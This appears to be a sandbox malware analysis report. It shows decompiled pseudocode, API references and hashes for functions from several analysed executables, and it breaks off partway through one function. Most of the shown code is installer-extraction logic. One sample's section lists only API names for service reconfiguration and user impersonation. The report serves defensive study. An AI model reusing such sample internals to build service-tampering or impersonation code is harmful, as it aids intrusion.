Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: e5da6d8e24696adf4027f0d8099c2a78984c55d8d0e404feab1b299968de6ddc
Instruction ID: 1fcf94867f210bf69ee6b836e7826301c484c208740cd42f4ce60938767262de
Opcode Fuzzy Hash: e5da6d8e24696adf4027f0d8099c2a78984c55d8d0e404feab1b299968de6ddc
Instruction Fuzzy Hash: 5311CC3151020A9FDB51DF68ED8DBAD77F4EF45340F108254FA12D7184DA709E51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012563C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E012563C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x1258004; // 0x958f311c
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E01251781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
				E0125658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x1259124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x1259124 = 0x80070052;
					_t37 = 0;
				}
				return E01256CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x012563cb
0x012563d2
0x012563d8
0x012563ea
0x012563f3
0x01256401
0x01256402
0x01256410
0x01256415
0x01256433
0x01256438
0x01256449
0x01256463
0x0125646d
0x01256477
0x01256477
0x0125647a
0x0125643a
0x0125643a
0x01256444
0x01256444
0x01256492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0125642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0125645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0125647A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012563EB

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 1065093856-1525623783
Opcode ID: 551da931081161293cb6d79d4e43aa954e0c143bf52795cfe56ae6fa13bf7e7f
Instruction ID: e9350804b2aba9109df5c98219f046f0071b26e79ec52d5f63c6b0ae9ff93510
Opcode Fuzzy Hash: 551da931081161293cb6d79d4e43aa954e0c143bf52795cfe56ae6fa13bf7e7f
Instruction Fuzzy Hash: A321D571A10219ABDB60DF25ECC9FEB7B7CEB44324F004269EA45A3140DAB05D858F64

Uniqueness

Uniqueness Score: -1.00%

Function 012547E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012547E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E01251680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x12591e0; // 0xa57c40
						 *(_t34 + 4) = _t11;
						 *0x12591e0 = _t34;
						return 1;
					}
					_t25 =  *0x1258584; // 0x0
					E012544B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x1258584; // 0x0
				E012544B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x012547e8
0x012547f0
0x012547f4
0x0125480f
0x01254811
0x01254814
0x01254814
0x01254816
0x01254817
0x01254829
0x0125482b
0x0125482f
0x0125484f
0x01254852
0x01254855
0x01254855
0x01254857
0x01254858
0x01254860
0x01254865
0x0125486a
0x0125486f
0x00000000
0x01254876
0x01254831
0x01254841
0x01254847
0x0125480b
0x00000000
0x0125480b
0x012547f6
0x01254806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01254E6F), ref: 012547EA
LocalAlloc.KERNEL32(00000040,?), ref: 01254823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01254847

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01254851

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 359063898-1525623783
Opcode ID: 0391f719d5e96c53650bb499f40007cdd649fac5fb8b88426619e21b1c88d0c2
Instruction ID: 26a78d333faf1aa541e380bb4c970d5ef78074860a3e616a68b05ee3f18c1dca
Opcode Fuzzy Hash: 0391f719d5e96c53650bb499f40007cdd649fac5fb8b88426619e21b1c88d0c2
Instruction Fuzzy Hash: 3F115C742107826FDB65AE34BCCCF767B5AE785310B048518EE4287349E6758C46C720

Uniqueness

Uniqueness Score: -1.00%

Function 01256517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01256517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x1259a3c; // 0x1250000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E012544B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0125651f
0x0125652a
0x01256534
0x0125656b
0x01256577
0x0125657c
0x01256536
0x0125653e
0x01256542
0x00000000
0x01256544
0x01256547
0x0125654c
0x01256549
0x01256549
0x01256549
0x0125655e
0x01256560
0x01256569
0x00000000
0x00000000
0x01256569
0x01256542
0x01256587

APIs

FindResourceA.KERNEL32(01250000,000007D6,00000005), ref: 0125652A
LoadResource.KERNEL32(01250000,00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01256538
DialogBoxIndirectParamA.USER32(01250000,00000000,00000547,012519E0,00000000), ref: 01256557
FreeResource.KERNEL32(00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01256560

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: bda953a4f334f914f25e0385f29b124f0a451f1afd32730a5bbe657c521b382c
Instruction ID: 333018f1d0680d87d9f8abe8058e2f2d46940c18666c6aca6dd7b3c6cd3d8250
Opcode Fuzzy Hash: bda953a4f334f914f25e0385f29b124f0a451f1afd32730a5bbe657c521b382c
Instruction Fuzzy Hash: B801D67215071ABBDB215E6DBCCDDBB7A6CEB85765B404225FF10A3144D771CD108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01253680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01253680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0125368c
0x0125368f
0x01253691
0x0125369f
0x012536a7
0x00000000
0x00000000
0x012536ba
0x00000000
0x012536bc
0x012536bc
0x012536c0
0x012536cb
0x012536c2
0x012536c4
0x012536c4
0x012536da
0x012536e0
0x012536e6
0x00000000
0x00000000
0x012536e6
0x00000000
0x012536ba
0x012536ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0125369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 012536B2
DispatchMessageA.USER32(?), ref: 012536CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 012536DA

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 09ba0b1b46b429d595c2613e1575de5a05a0f6e850a7fb9e6d07df5c674e7203
Instruction ID: b90db4c30952918371e4157a66401259865a2777628ed7c6fa13fafedfca369f
Opcode Fuzzy Hash: 09ba0b1b46b429d595c2613e1575de5a05a0f6e850a7fb9e6d07df5c674e7203
Instruction Fuzzy Hash: 090184729102197BDB308AAA6C8DEEB7A7CFB85B50F00021DBE05E2184D570C540C774

Uniqueness

Uniqueness Score: -1.00%

Function 012565E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012565E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x012565e8
0x012565ed
0x012565ef
0x012565f2
0x012565f4
0x012565f4
0x012565f6
0x012565f7
0x01256608
0x01256611
0x01256618
0x0125661c
0x00000000
0x00000000
0x0125660e
0x01256623
0x01256625
0x0125663b
0x0125663b
0x0125663d
0x01256641
0x01256610
0x01256610
0x00000000
0x01256610
0x01256644
0x01256647
0x01256647
0x01256621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01252B33), ref: 01256602
CharPrevA.USER32(?,00000000), ref: 01256612
CharPrevA.USER32(?,00000000), ref: 01256629
CharNextA.USER32(00000000), ref: 01256635

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 25b644a95e12c7f9746bfe7b1a64171abb134e5a548231e56e099d7b57fff87c
Instruction ID: b6874ba08169e4abd01c88c8baa9a2c13794f4623f25cd067e973711ab3deb27
Opcode Fuzzy Hash: 25b644a95e12c7f9746bfe7b1a64171abb134e5a548231e56e099d7b57fff87c
Instruction Fuzzy Hash: 58F028325142516EE7330A2CACCC8BBBF9CCF871A575942AFEA9183001D6B909068771

Uniqueness

Uniqueness Score: -1.00%

Function 012569B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012569B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x12581f8 = E01256C70();
				__set_app_type(E01256FBE(2));
				 *0x12588a4 =  *0x12588a4 | 0xffffffff;
				 *0x12588a8 =  *0x12588a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x1258528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x125851c; // 0x0
				 *_t5 = _t12;
				_t6 = E01257000();
				if( *0x1258000 == 0) {
					__setusermatherr(E01257000);
				}
				E012571EF(_t6);
				return 0;
			}

0x012569b7
0x012569c2
0x012569c8
0x012569cf
0x012569d8
0x012569de
0x012569e4
0x012569e6
0x012569ec
0x012569f2
0x012569f4
0x01256a00
0x01256a07
0x01256a0d
0x01256a0e
0x01256a15

APIs

Part of subcall function 01256FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01256FC5

__set_app_type.MSVCRT ref: 012569C2
__p__fmode.MSVCRT ref: 012569D8
__p__commode.MSVCRT ref: 012569E6
__setusermatherr.MSVCRT ref: 01256A07

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: b68d6e14a90ff180c7127798921572471ae70e2eeb5c1a03e6daca3afb7b76b5
Instruction ID: 8b1d88a0ed75257a5a86339c0c416d5d1e016ad01a3a4f23d433fff96ac24f37
Opcode Fuzzy Hash: b68d6e14a90ff180c7127798921572471ae70e2eeb5c1a03e6daca3afb7b76b5
Instruction Fuzzy Hash: 8BF0F2B45543028FC7B8AB35B5CF6293BA1FB04331B904609D862862D8DFBA8540CB10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: f7051zI.exePID: 5244, Parent PID: 5268COMMON

Execution Graph

Execution Coverage:	58.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	19.4%
Total number of Nodes:	31
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFC9DD11B10 Relevance: 2.0, APIs: 1, Instructions: 548
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32 ref: 00007FFC9DD11FD1

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 6b576371adb67ad59db177652c61baa26c73285e39842fc793e2484b4ca2be01
Instruction ID: 0460cb5b353bc98cb1e3b4f0c12fe9137ec82506105349ab53f828556a1e9887
Opcode Fuzzy Hash: 6b576371adb67ad59db177652c61baa26c73285e39842fc793e2484b4ca2be01
Instruction Fuzzy Hash: 1E028330918A4D4FEB7CDE28DC467F97BD1FB58310F10426ED89EC7291EA74A5818B92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD1077D Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FFC9DD10989

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9ddf5fab5ca1838a66c96b74129deb8f063a11d7df3eef50c46c32ad882584ce
Instruction ID: 335a0bb83a3837da69f4caab8127aa92da3bedbc61e8d0ec55a62ae140b105ad
Opcode Fuzzy Hash: 9ddf5fab5ca1838a66c96b74129deb8f063a11d7df3eef50c46c32ad882584ce
Instruction Fuzzy Hash: D8917F3060CA8D8FEB68EF18C8557F97BE1FF58310F04416AE84DC7291EA75A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD10108 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00007FFC9DD1012C

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 99f6b2276fe857e5fd8769579de90403a34a1dbfee6316627d9f152fdd24aea3
Instruction ID: 9216f9a2a014db887acd249a1dcbbbf3f000060f2e054bc35570238a977c9b9f
Opcode Fuzzy Hash: 99f6b2276fe857e5fd8769579de90403a34a1dbfee6316627d9f152fdd24aea3
Instruction Fuzzy Hash: 2021B171A0CA5C8FDB58DF58C8497F9BBE0EB65321F00412ED049D3192EB74A946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD10C34 Relevance: 1.7, APIs: 1, Instructions: 220
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FFC9DD10D99

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: f317566345224a776ee06904b9178f5d8d51c1c97b0335960c1a0ce28f0ffd17
Instruction ID: 3d959f62f9a6e2da32f623e3fa81bd368df18374b3b767ee3fd3604be02edaa4
Opcode Fuzzy Hash: f317566345224a776ee06904b9178f5d8d51c1c97b0335960c1a0ce28f0ffd17
Instruction Fuzzy Hash: CF61E63150CA8C4FDB6CEF28C8467B43BD1FB59310F10416EE88DC3292EA74A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD10B2D Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FFC9DD10BFA

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 76ef2ceabb42a2a763edaf0c7180407791e0b11deab06a73734f7caa99c2da14
Instruction ID: 252d3c152dbef9f9ccd1a4dc3eebb96689afc8a610956623a05458424df00c5b
Opcode Fuzzy Hash: 76ef2ceabb42a2a763edaf0c7180407791e0b11deab06a73734f7caa99c2da14
Instruction Fuzzy Hash: CB318F7190CA5C8FDB28DF989849AFABBF0EB59311F00816FD08AD3652DB706545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD11A1D Relevance: 1.6, APIs: 1, Instructions: 120
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FFC9DD11ACB

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 5d68667866f23b3825cec222e06b31e5d9a8139b2e831bba08455bc8e32e1241
Instruction ID: 759148c3a07da3bd978e3c00621fff403a0660914374dcf07dd4eb7f551c5158
Opcode Fuzzy Hash: 5d68667866f23b3825cec222e06b31e5d9a8139b2e831bba08455bc8e32e1241
Instruction Fuzzy Hash: CA31A43190CA5C8FDB28DF9C9845AF97BF4EB55311F04416EE08AD3292DB74A446CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD1108A Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FFC9DD11145

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6fc31aad2c6decbce0a45ce012788ca487758116f814c6068e6309bcf3e9900c
Instruction ID: aba258576958f335362db82d3f3f6a95fc6146468eccb32c4697481ecb6fdb6b
Opcode Fuzzy Hash: 6fc31aad2c6decbce0a45ce012788ca487758116f814c6068e6309bcf3e9900c
Instruction Fuzzy Hash: 4631083190C78C8FDB1ADB6888157E9BFF0EF57320F04429FD089D31A2DA656856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9DD11760 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FFC9DD117F5

Memory Dump Source

Source File: 00000003.00000002.269705170.00007FFC9DD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9DD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc9dd10000_f7051zI.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: f299775553c1f49036b8b4a1020885dfe4534bedc085718da1ad06493b62762e
Instruction ID: 072b86bb0f357ad91b7de4073d2e13d9d5f418883f39180d8b68a344d4e5f771
Opcode Fuzzy Hash: f299775553c1f49036b8b4a1020885dfe4534bedc085718da1ad06493b62762e
Instruction Fuzzy Hash: 4131E53190CA5C8FDB58DF68C849BF9BBE0EB55321F00422ED049D3192DB74A456CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: h99af07.exePID: 6132, Parent PID: 5268COMMON

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
